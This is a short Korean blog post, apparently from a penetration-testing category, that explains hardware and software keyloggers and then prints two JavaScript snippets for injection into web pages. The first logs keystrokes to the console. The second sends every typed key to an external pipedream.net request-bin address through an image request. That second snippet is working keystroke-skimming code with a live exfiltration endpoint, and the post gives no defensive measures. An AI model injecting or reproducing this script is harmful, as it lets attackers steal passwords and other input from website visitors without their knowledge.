키로거는 컴퓨터 또는 모바일장치에서 사용자의 키입력을 기록하는 소프트웨어나 하드웨어를 말한다.
키로거는 운영체제 레벨에서 작성하거나 악성 소프트웨어 등으로 숨겨진 상태로 실행 될 수도 있다.
사용자의 키보드 사용 즉, 입력이 발생하게 되면 어떠한 형태로든 저장/전송한다.
하드웨어 키로거
컴퓨터 키보드나 usb포트와 연결되어 실제 키 입력을 기록하게 된다. 이러한 하드웨어는 외부에서는 발견하기 힘들며 주로 사전에 접근한 사용자에 의해 설치되는 경우가 많다.
소프트웨어 키로거
소프트웨어 키로거는 이름대로 소프트웨어로 사용자의 컴퓨터나 모바일장치등에 침투해 사용자의 키보드 사용시 입력한 키를 기록한다.
JS를 통하여 작성한 키로거는 웹에서 사용이 가능하다. 이때 이벤트 핸들러를 통하여 키의 입력을 판단하고 그 값을 탈취 할 수 있다. 따라서 다음과 같은 JS코드를 웹에 삽입을 할 경우 그 키를 콘솔창에 출력할 수 있다.
<script>
var all_key = "입력값: ";
window.addEventListener("keydown", function() {
all_key += event.key;
console.log(all_key);
});
</script>이제 콘솔창에 출력이 아닌 이 값을 다른 페이지로 전송 할 것이다. 그 코드는 다음과 같다.
<script>
var all_key = "input:";
window.addEventListener("keydown", function() {
all_key += event.key;
var i = new Image();
i.src="https://en5wnfsipgzh9.x.pipedream.net/?inputkey=" + all_key;
});
</script>'모의해킹 및 보안' 카테고리의 다른 글
| XSS정리 (0) | 2023.05.22 |
|---|---|
| CSRF_요청을 보내지만 페이지 유지하는방법. (0) | 2023.05.19 |
| XSS 보안대책 (0) | 2023.05.11 |
| XSS_공격코드 예시 (0) | 2023.05.09 |
| XSS_ 공격 코드 유형 (1) | 2023.05.07 |
